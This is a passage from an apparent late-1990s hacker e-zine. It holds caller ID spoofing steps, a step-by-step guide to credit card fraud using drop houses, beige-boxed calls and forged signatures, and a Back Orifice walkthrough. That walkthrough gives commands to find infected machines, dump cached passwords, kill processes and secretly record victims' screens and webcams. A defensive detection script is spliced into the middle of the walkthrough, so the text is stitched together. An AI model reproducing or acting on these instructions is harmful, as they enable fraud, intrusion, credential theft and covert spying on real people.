  YES to confirm
  ... updating (does so immediately)

SNPA is the area code of the line this is being done on.
OFFICE CODE is the exchange/prefix of the line this is being done on.
FROM DIGITS is the last four digits of the line this is being done on.
TO DIGITS is also the last four digits of the line this is being done on. (It can be done to a series of lines.)
NET NAME is PUBLIC
FUNCTION - there are three legit functions: ADD add. CHA change. DEL delete (self-explanatory)
OPTION is ADDRESS (phone number)
NPA is area code you want your new Caller ID to be
OFFICE CODE is the new exchange/prefix you want to have
DIGITS are the last four digits of the new Caller ID to be!
YES to confirm
....updating

Now you can call anyone who has Caller ID and they will think you are calling from the number you changed it to. Please note the following effects and ramifications:

ANI still passes normally. It is only the Caller ID signal which changes. So anyone doing serious investigating at the phone company can still pull Last Incoming Call, etc., correctly.

Billing is not affected. That is, you cannot bill to the virtual (artificial) number.

Call Return will call back the Caller ID, so if it's in the same area, it will call back the number. If the Caller ID you chose is from a different area, Call Return won't work. This is one of my favorites. Since having a non-pub number doesn't stop people from Call Returning you. Now it does!!

800 numbers: AT&T 800's will always get your ANI. MCI tends to usually grab your ANI. Operator 800's will definitely get your ANI. (800-225-5288). Sprint 800's can be configured either way. For example, AOL (America On Line) 800's get ANI. (Yes, they resporg to Sprint.) However, Western Union, and other Sprint 800's, read the Caller ID. Most newer 800's read the Caller ID, but one must test to know for sure.

The above method of altering Caller ID on a line is the only legitimate way I have ever found to do so that really works. Can the same thing be done on 5ESS? Not that I am aware of, and I have researched it pretty thoroughly. I have not researched Siemens switches, or others.

Tchau for now. Have phun.
4.a - Glossary

    ACK   -- Acknowledgment
    ANI   -- Automatic Number Identification
    ASCII -- American Standard Code for Information Interchange
    BFSK  -- Binary Frequency Shift Keying
    CAS   -- CPE Alerting Signal
    CID   -- Caller Identification or Caller ID
    CIDCW -- Calling Identity Delivery on Call Waiting or Caller ID on Call Waiting
    CNAM  -- Calling Name Delivery
    CND   -- Calling Number Delivery
    CPE   -- Customer Premise Equipment
    CPNM  -- Calling Party Number Message
    DTMF  -- Dual-Tone Multifrequency
    FCC   -- Federal Communications Commission
    FSK   -- Frequency Shift Keying
    ID    -- Identification
    LATA  -- Local Access and Transport Area
    LSB   -- Least Significant Bit
    LSSGR -- LATA Switching Systems Generic Requirements
    MDMF  -- Multiple Data Message Format
    OSI   -- Open Switch Interval
    PC    -- Personal Computer
    SAS   -- Subscriber Alerting Signal
    SDMF  -- Single Data Message Format
    SPCS  -- Stored Program Control Switching System
    SS7   -- Signaling System 7

4.b - Resources on the internet

    http://www.markwelch.com/callerid.htm
    http://members.xoom.com/hoal/cpid-ani.txt
    http://bc1.com/users/fixer/files/BEATCID.TXT

-hatredonalog

─────────────────────────────────────────────────────────────────────────

╒═════════════════════════════════════════════════════════════════════════╕
│ 4. Carding.......Unexplored Territory Vol. 2 of 2                       │
│ by Neptunium Overkill (quixilver@mailexcite.com)                        │
└─────────────────────────────────────────────────────────────────────────┘

DISCLAIMER: The activity described in this article is highly illegal and you can get a long time in jail for doing it. Be careful if you ever do it and REMEMBER, no one is responsible for your actions but yourself.

Make sure you read Carding.......Unexplored Territory Vol. 1 of 2, published in DPP 8.

INTRO: So you've got yourself some credit card numbers and now you want to buy neat stuff for you and your buds. In this article you will learn how to easily and safely order things with your cards.
If you read and follow the instructions carefully you will have no trouble receiving your packages. OK, well let's get started.

The first thing you will need to do is find a place to drop the stuff you are going to order. Now, if you are a real dope you might be thinking "Hey! I can just get the stuff shipped to my house! The cops will never find out!" Sorry, but that just isn't going to work. Yes, the stuff would probably come as planned, but then after the card owner receives the bill and calls the company to complain that they didn't buy any of this, the card company will call the store and ask who the items were shipped to. The store will then pull up the address the gear was shipped to and it will just happen to be your address. I trust that you know what would happen after that. Anyway, you are going to need a drop site. The thing I recommend is an empty house or apartment, OR if you are real careful you can have the stuff shipped while the resident of the house is at work. Take a walk around your neighborhood and you are sure to find a good drop site. If you are unsuccessful you can ask your CLOSE friends if they know of any vacant houses near them. Once you have a place to use, write down the address. You are now finished with step one.

The second step is ordering the items. There are three ways to order stuff: www, phone, or mail. To order using the web make sure the company you want to order from has internet ordering (duh). If they don't, look around; you can buy all kinds of stuff on the net and there is probably someone who sells what you want via the web. For extra security, you may want to use a PPP/SLIP account other than the one that has your or your parents' name on it, or a shell account that you have acquired, but you will probably be just fine using your own account to order the merchandise. Pretty self-explanatory after that.

To order by phone, there are two precautions to take: first, don't use your own phone line. Use your beige box and dial away.
The other precaution is that you are going to have to have a somewhat low voice. If you are 16+ then you will pass as an 18 year old, but if you are 12 and sound like a little kid or something, then don't try it. If you are not sure if you could pass as a credit card owner, then get a CLOSE friend with a lower voice to call.

The last way to order things is by US Mail. Now, just pick what you want out of the catalog and fill out the order form, but remember: be VERY careful on the signature. Practice a realistic looking signature many times on a sheet of paper until you think it looks believable. Now, check over your order form, and stick it in the envelope. When you mail the order form, it will probably work fine just to mail it from a public mail box (don't do it from your house), but if you want to be really convincing then find a hacker/phreak/cool person in the city of the cardholder, stick the order form's envelope in a larger envelope and address that one to them, then have them mail the order form's envelope (this will make it look like the cardholder is buying someone in your city a birthday present).

The third and final step is to pick up the gear. What you will have to do now is write a note for the UPS man. Have it say something like "Hi. I am at work right now so please leave it on the doorstep. Thank you." Make sure you have the note out there before 9 A.M. on the first possible day the package could arrive. This almost always works.

Anyway, that's about it. If you have questions you can e-mail me.

HEY!!!!!!!: Fast T3 Shells! Always up! For less money than you make in an hour at work! Only $5 a month from www.darksphere.net. Last one there is a rotten mango!

-neptunium overkill

─────────────────────────────────────────────────────────────────────────

╒═════════════════════════════════════════════════════════════════════════╕
│ 5. Back Orifice for Fun and Profit, part 1 of 5                         │
│ by MMX Killa (help@beer.com)                                            │
└─────────────────────────────────────────────────────────────────────────┘

Fact: There have been over 250,000 downloads of Back Orifice since its release in August.
Fact: Approximately 74% of Australian Internet providers are infected with Back Orifice.
Fact: Back Orifice can be more fun and fulfilling than prank calls.
Opinion: Back Orifice can be more fun and fulfilling than masturbation.

What do all of these facts mean to you? NOTHING. Anyway, let's say that you were a shrewd hacker punk, and you woke up one Sunday at 3PM, and said "hey! I think I'll take over a random person's computer today!" How would one go about completing such an audacious task? The answer to that, my friend, is Back Orifice.

Back Orifice, a tool designed by the Cult of the Dead Cow (I bow to the cow!), is a remote administration tool that was designed to be used for the purposes of good. However, history has shown us that when hackers design tools that are "good", they usually give the hacker a purpose. Take, for example, S.A.T.A.N. SATAN, or System Administrator's Tool for Analyzing Networks, is a portscanner that allows one to see vulnerabilities on their network. Yes, a sysop can use this to strengthen their network, and yes, a hacker could use this to see where other networks need strengthening. Back Orifice is very similar to this. Back Orifice is a tool that is installed on a person's (target's) computer, that allows the sysop (hacker) to obtain full control of that machine. Back Orifice can log keystrokes, capture screen images, edit the registry, make and break network shares, show cached system passwords, spawn programs, redirect ports, reboot the machine, pop up cute lil dialog boxes, and it also slices, dices, and makes julienne fries. Think about that for a moment: you could literally have more power from your home than the person at the keyboard of the machine has.
Hell, you could add format commands in someone's autoexec.bat file, you could spawn twenty of those annoying "sheep" programs, and then capture a picture to show all of your friends at school why the new Indian kid is crying in the corner. Why, you might ask? Because he was owned!

Let's begin this lesson by going over what's packaged with Back Orifice that you will need to own your neighborhood. First, unzip the file that you downloaded. If you suddenly find yourself in an AOL chat room asking for 31337 WaReZ d00dz to help you run Back Orifice, then I'm sorry, you're beyond help. You'll find a few files. You should find all of these:

    bo.txt       - the user's guide
    plugin.txt   - a text for people who want to write plugins (BUTTplugs)
    boserve.exe  - please, don't run this on your machine.
    bogui.exe    - the Back Orifice GUI client (ie: windows form type)
    boclient.exe - the Back Orifice command line client (ie: DOS)
    boconfig.exe - the utility to configure your server before you install it.
    melt.exe     - a decompressor
    freeze.exe   - a compressor

Okay, if you didn't get all of these files, I'd suggest downloading Back Orifice again. Hell, from now on, I'm not typing "Back Orifice". I'm just going to put down "BO". Anyway, the two files that you'll definitely need are boclient.exe and bogui.exe. If you want to install copies of BO on other people's machines, then keep boserve and boconfig. The texts are good references, and the only thing that melt and freeze are good for is downloading screen shots quickly.

Command Line client (the most useful for most things)

Anyway, let's go over some basic commands. To find and connect to a host, you'll have to use the sweep and host commands. For some reason, I cannot get the sweeper to work in the GUI client. Now, let's say you know the subnet of the person that you're looking for. If that person's IP address usually began with 206.152.172, then that would be the subnet that you would sweep.
So you'd type in this:

    sweep 206.152.172

If you're lucky, you'll see something like this:

    ---------- Packet received from host 206.152.172.124 port 31337 ---------
    !PONG!1.20!DEFAULT!
    ------------------------- End of Data -------------------

Congratulations! You found a computer that's been infected with Back Orifice! Of course, this may not be the computer that you're looking for, but it is at least a computer that you can practice your basic skills on. So how do I do anything from here? I'll look at what I see on my screen, and I'll analyze it. The format for the Pong response is this:

    !PONG!version!computername!

In most cases, you'll be able to tell if this is your target just by the computer name. However, in a lot of cases, the computers are just named "DEFAULT", so you'll have to connect to it for more information. It says "Packet received from host 206.152.172.124 port 31337". It doesn't take a genius to figure out that this means that the IP address that you'll use is 206.152.172.124. So to set your client to talk to that host, type in:

    host 206.152.172.124

Great! You're set up to own that host now. So how can I determine if this is my target or not? Simple, just use the INFO command! The info command gives you some basic info about your target host, such as the user login name, and more. Let's look at a sample response to the command of:

    info

You'll type that, and your target will spew up something like this:

    ------- Packet received from 206.156.160.101 port 31337 -------
    System info for machine 'DEFAULT'
    Current user: 'Barry'
    Processor: I586
    Win32 on Windows 95 v4.0 build 950
    Memory: 39M in use: 90% Page file: 366M free: 335M
    C:\ - Fixed Sec/Clust: 64 Byts/Sec: 512, Bytes free: 350289920/1279688704
    D:\ - CD-ROM
    E:\ - Removable
    End of system info
    ------- End of data -------

Now of course this is just a sample, and it would be really bad if we were just targeting some lame pedophile who we found by accident. So anyway, let's look at the response.
It tells you the computer name, the user that's currently logged in, what kind of processor the computer is running, the operating system that your target is using, memory statistics, and drive information. The string of numbers after the hard drive letter is of course "freespace/totalspace", but for some reason BO is not capable of detecting anything more than 2GB, so FAT32 users will still be listed as 2GB capacity.

The next command that we'll learn is the passes command. As you may have already guessed, this will give you information on any password stored in the user's cached passwords file. This is MSIE only, so nothing that's a Netscape cached password will show. So you'd type in the passes command, and you'll see a response like this:

    ------- Packet received from 206.152.167.64 port 31337 -------
    Password cached by system:
    index:02(01) len:16(07/12) Resource: 'HUSEMAN' Password: 'X'
    index:00(04) len:18(05/52) Resource: 'MAPI' Password: 'MAPI'
    Resource: '*Rna\Worldpath\Chevalier72' Password: 'PMKNC19'
    index:01(06) len:68(50/92) Resource: '*Rna\Microsoft Internet Referral Service\icwsignup' Password: 'icwsignup'
    End of cached passwords.
    ScreenSaver password: 'MILENKO'
    ------- End of data -------

Now naturally, the last item in this list is the screen saver password. If the computer doesn't have a screen saver password, it'll just say "Unable to read value 'ScreenSave_Data'". Don't worry about it. The "index:" line means shit to a beginner; it's just about where BO found the information. The "len:" line means how strong the encryption on the password was. A few tips and tricks about this feature: Any value that starts with *Rna\ is a dialup networking password, with the name for the connection next, and then the user name. The two things that you can outright ignore are the "MAPI" and the "Microsoft Internet Referral Service" passwords.
They are on almost every computer; it's just some bullshit about signing up to the internet for the first time. The format for the resource is this:

    'NAME OF RESOURCE\USERNAME' Password: 'whatever'

Just because the name of a resource is a www.whatever.org, it doesn't mean that the actual place to put in your password is whatever.org. It's a very weird thing. But for the most part, you can ignore everything but the beginning and the end values.

Now, you have pretty much already owned this person. But now you wonder, "What are they doing right now?" Well, there are two ways of finding out. One way is to use the PROCLIST command. PROCLIST is a neat feature that allows you to see all of the programs that your target computer is running. Here's an example of a response from a computer (shortened):

    ------- Packet received from 206.152.167.145 port 31337 -------
    pid - Executable
    4291799303 C:\WINDOWS\SYSTEM\KERNEL32.DLL
    4294936047 C:\WINDOWS\SYSTEM\MSGSRV32.EXE
    4294963087 C:\WINDOWS\SYSTEM\MPREXE.EXE
    4294954415 C:\WINDOWS\mediaplt\ecidmn.exe
    4294457359 C:\PROGRAM FILES\DR SOLOMON'S\ANTI-VIRUS\WGFE.EXE
    4294954603 C:\WINDOWS\SYSTEM\ .EXE
    4294468987 C:\PROGRAM FILES\DISTRIBUTED.NET\RC5DESG.EXE
    4294460775 C:\WINDOWS\EXPLORER.EXE
    4294507799 C:\WINDOWS\SYSTEM\SYSTRAY.EXE
    4294497487 C:\WINDOWS\YBOT.EXE
    4294492751 C:\PROGRAM FILES\AIM95\AIM.EXE
    4294547167 C:\WINDOWS\SYSTEM\RNAAPP.EXE
    4294535895 C:\WINDOWS\SYSTEM\tapiexe.exe
    4294541983 C:\WINDOWS\SYSTEM\LIGHTS.EXE
    4294583531 C:\PROGRAM FILES\ICQ\ICQ.EXE
    4294609115 C:\INFINET\NETSCAPE\PROGRAM\NETSCAPE.EXE
    End of processes
    ------- End of data -------

Take note of the fact that it shows the hidden system processes such as Kernel32.dll, Msgsrv32.exe, and explorer.exe. And do you want to know a really super neat trick? If you use PROCLIST's sister commands, PROCSPAWN and PROCKILL, you can start and kill programs, respectively.
As you're probably not wondering, the numbers next to the file name of each running program are the PIDs, which you use with the PROCKILL command. So in the example above, the PID for Netscape is 4294609115. So to kill this, I would type in:

    PROCKILL 4294609115

!!!!! Super Genius Idea !!!!!
Use the prockill command with the PID of " .exe" and watch as none of your commands go through until they restart the computer!
!!!!! Super Genius Idea !!!!!

In the same light, if I had uploaded a program to the server, or I just wanted to run a program on their computer, I could use the PROCSPAWN command. To use this, type in PROCSPAWN, followed by the FULL path of the program, including drive letter. So if you wanted to run a file called c:\windows\sol.exe (solitaire), I would type:

    PROCSPAWN C:\Windows\sol.exe

It's a lot easier than it seems, isn't it? Suddenly and magically, Solitaire would begin running. It might not pop up as the active window, but it would still run and appear in their taskbar.

Continuing with the "What are they doing?" theme, you can use a really fun command - the CAPSCREEN command. As you may have guessed from the name, this captures the screen image and saves it to a specified file. This is shockingly similar to the "Print Screen" key on your computer. So, to use this, you'll just type in CAPSCREEN and then the file it should be saved as. So if I wanted to save it as screen.bmp (the format is a bitmap), I would type in:

    CAPSCREEN c:\screen.bmp

The typical response to this is something like this:

    ------- Packet received from 206.152.167.145 port 31337 -------
    Bitmap (800x600x16) captured to c:\screen.bmp
    ------- End of data -------

The format for the response is: Bitmap (WIDTHxHEIGHTxCOLOR DEPTH). For those of you who don't know what color depth is, it's the number of bits used for color assignment. The larger the number, the more bits used, hence the more possible colors.
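Seen from the other side of the keyboard, the " .EXE" entry in the PROCLIST listing above is the Back Orifice server itself under its default file name (that is what the "super genius idea" kills), and the server answers on UDP port 31337 unless it was reconfigured. The following Python checker is an added example, not code from the article or from the Cult of the Dead Cow: it parses a constructed process listing in the same "pid path" layout as a PROCLIST reply and flags any executable whose file name before the extension is blank or whitespace only, and it scans constructed netstat-style lines for a socket bound on 31337. Both input samples are made up here to match the formats shown in the article; the netstat layout is the usual "Proto  Local Address  Foreign Address  State" table.

```python
import re
from typing import Dict, List

# Constructed sample (not real output): a Win9x process listing in the same
# "pid path" layout as a Back Orifice PROCLIST reply. The entry whose file
# name is a lone space (" .EXE") is the BO server under its default name.
SAMPLE_PROCLIST = """\
pid - Executable
4291799303 C:\\WINDOWS\\SYSTEM\\KERNEL32.DLL
4294936047 C:\\WINDOWS\\SYSTEM\\MSGSRV32.EXE
4294954603 C:\\WINDOWS\\SYSTEM\\ .EXE
4294460775 C:\\WINDOWS\\EXPLORER.EXE
4294609115 C:\\INFINET\\NETSCAPE\\PROGRAM\\NETSCAPE.EXE
End of processes
"""

# Constructed sample in the layout of "netstat -an": one UDP socket is bound
# on 31337, the default Back Orifice port used throughout the article.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:31337          *:*
"""

BO_DEFAULT_PORT = 31337

_PROC_LINE = re.compile(r"^(\d+) (.+)$")              # "<pid><space><full path>"
_SOCK_LINE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s")  # "<proto> <addr>:<port> ..."


def parse_proclist(text: str) -> List[Dict[str, str]]:
    """Parse 'pid path' lines; the header and 'End of processes' footer are skipped."""
    procs = []
    for line in text.splitlines():
        m = _PROC_LINE.match(line)
        if m:
            procs.append({"pid": m.group(1), "path": m.group(2)})
    return procs


def is_blank_name(path: str) -> bool:
    """True when the file name before the extension is empty or whitespace only."""
    basename = path.rsplit("\\", 1)[-1]
    stem = basename.rsplit(".", 1)[0] if "." in basename else basename
    return stem.strip() == ""


def suspicious_processes(text: str) -> List[Dict[str, str]]:
    """Processes whose executable has a blank name, e.g. C:\\WINDOWS\\SYSTEM\\ .EXE."""
    return [p for p in parse_proclist(text) if is_blank_name(p["path"])]


def sockets_on_port(text: str, port: int = BO_DEFAULT_PORT) -> List[str]:
    """Local sockets from netstat-style lines that are bound on the given port."""
    hits = []
    for line in text.splitlines():
        m = _SOCK_LINE.match(line)
        if m and int(m.group(3)) == port:
            hits.append(f"{m.group(1)} {m.group(2)}:{m.group(3)}")
    return hits


if __name__ == "__main__":
    for p in suspicious_processes(SAMPLE_PROCLIST):
        print(f"blank-named executable: pid {p['pid']} -> {p['path']!r}")
    for s in sockets_on_port(SAMPLE_NETSTAT):
        print(f"socket bound on {BO_DEFAULT_PORT}: {s}")
```

Either hit on its own is only a hint: the server can be renamed and re-ported with boconfig, so the file name check and the port check are cheap first looks, not proof of a clean machine.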
To retrieve this file, you'll have to use the HTTP server, which we'll get into later.

!!!!! Super Weird Software Bug !!!!!
Sometimes, you'll capture a screen shot that has its color depth set higher than your video card is set to. If you're running 256 colors, and sometimes even 16-bit High Color, you'll run into a weird problem: the colors will be fucked up. I don't believe that there is a solution to this problem other than to just set your video card to a higher color depth.
!!!!! Super Weird Software Bug !!!!!

Another super fun thing to do is to use their QuickCam or other video capture devices. Sometimes, you get to see who you're owning! The first thing that you'd have to do is find out if they even have a video capture device. Use the LISTCAPS command to get a list of devices. When the packets come back, each capture device (if any) will have a number next to it, usually a 0 or a 1, since most people don't have 3 or more QuickCams on their comp. Once you have determined that they own a capture device, you can use the CAPFRAME and CAPAVI commands to see what they're doing. The difference between these two is frighteningly obvious. The CAPFRAME command captures one individual frame of video from the capture device, and saves it to a specified file in bitmap format. This is a complex command, so follow along. The format is this:

    CAPFRAME BITMAPFILENAME devicenumber,width,height,bitplanes

So if the person's QuickCam was device 0 on their comp, and I wanted to save a 16-bit, 640x480 image to c:\windows\temp\quickcam.bmp, I would type in:

    CAPFRAME c:\windows\temp\quickcam.bmp 0,640,480,16

Remember, bitplanes are your color depth. Most people run their computers at 16-bit or 30-bit. However, 256 color mode for older computers is actually 8-bit, so if you're running 256 colors, don't waste video memory with anything higher than 8-bit. Once again, you'd have to retrieve this file with the HTTP server, but we will, soon enough, get into this.
The CAPAVI command is in a very similar format to CAPFRAME, so just look:

    CAPAVI AVIfilename seconds,device,width,height,bitplanes

The only difference is that before the device number, I'd put the number of seconds to record. So to record a 10 second, 16-bit, 640x480 clip from the QuickCam, device 0, saved to c:\windows\temp\quickcam.avi, I would type:

    CAPAVI c:\windows\temp\quickcam.avi 10,0,640,480,16

And then once again retrieve it with the HTTP server.

So how the fuck do you get all of these files that you've just saved on their computer? Simple: Back Orifice has a built in HTTP server, so spiffy that you'll want to run it as soon as you connect to a target host. Now this is really really easy to do, so listen really carefully: It's HTTPON portnumber, so to turn the HTTP server on using port 80 (please, just use 80), I'd use:

    HTTPON 80

Of course, there is an HTTPOFF command, but since there would really be no reason for you to turn it off, I'm just going to tell you how to use it anyway. Type in HTTPOFF. Done. Of course, you'll need a quality browser like Netscape to do this, because I have never gotten MSIE 4.0 to work properly with this. So fucking download Netscape NOW!

Well, for the time being, that's it. Check back the next time DPP publishes an article for more.

PLA914's Back Orifice Proposition: Don't ya just hate it sometimes when someone takes over your territory? Well... Why not do this: Prepare a text file that lists your handle, and your territory (the specific subnets, don't just say "I own 152.*"), and save it as OWNED.TXT. Then, using the HTTP server, upload it to their C: drive. Hopefully, if more people begin to do this, people will stop fucking around with your targets, and you can take over your territory freely.

By the way: if you suspect that someone else is connected to the same computer you are, look for text like this:

    [Lost 4 Packets?]

That's the telltale giveaway.
-MMX_Killa

─────────────────────────────────────────────────────────────────────────

╒═════════════════════════════════════════════════════════════════════════╕
│ 6. Outro: Opossum                                                       │
│ by hatredonalog (hatredonalog@hotmail.com)                              │
└─────────────────────────────────────────────────────────────────────────┘

Well, DPP is going to die for a while. How long you say? Oh, about 3-4 months. After that we'll come back to life, do a reorg of the group, take on some new talent that I've wanted to come on board for a little while (you know who you are) and go through a total change in appearance. At this stage we still look like a bunch of immature script kiddies (*not* what I had intended).

The reasons for our temporary death are simple. Our writing/editing staff has damn near fallen off the face of the earth. First Dark|||Knight went missing (jail?) and napalmoliv has also disappeared (work and school ate him), Sphinx is without a boxen and the rest of us have gotten pretty lazy. A large majority of my time has been taken up by school and work (and sleeping). Even though overkill, mmx_killa, nothingg and myself _could_ run the zine, we haven't had much to publish. I wrote a rather good linux tutorial, but due to a computer problem, it was erased. Now I'm sure it's sitting physically on the drive, but I can't get it. =(

Well, that's about the long and short of it. I'm going to be trying to recruit some new writers (who will write stuff!), and I'll probably be the only editor (cause I can get them out on time, due to not having a life). When we do come back, we will have a new look, a new style, and we'll still be your p1mp.

-hoal

─────────────────────────────────────────────────────────────────────────

"Sir, we've stopped producing DPP, and if you're going to get violent about it I'm going to have to go get my manager..." -hoal

"We've stopped producing DPP, now pick up the pieces of your shattered life and move on." - Neptunium Overkill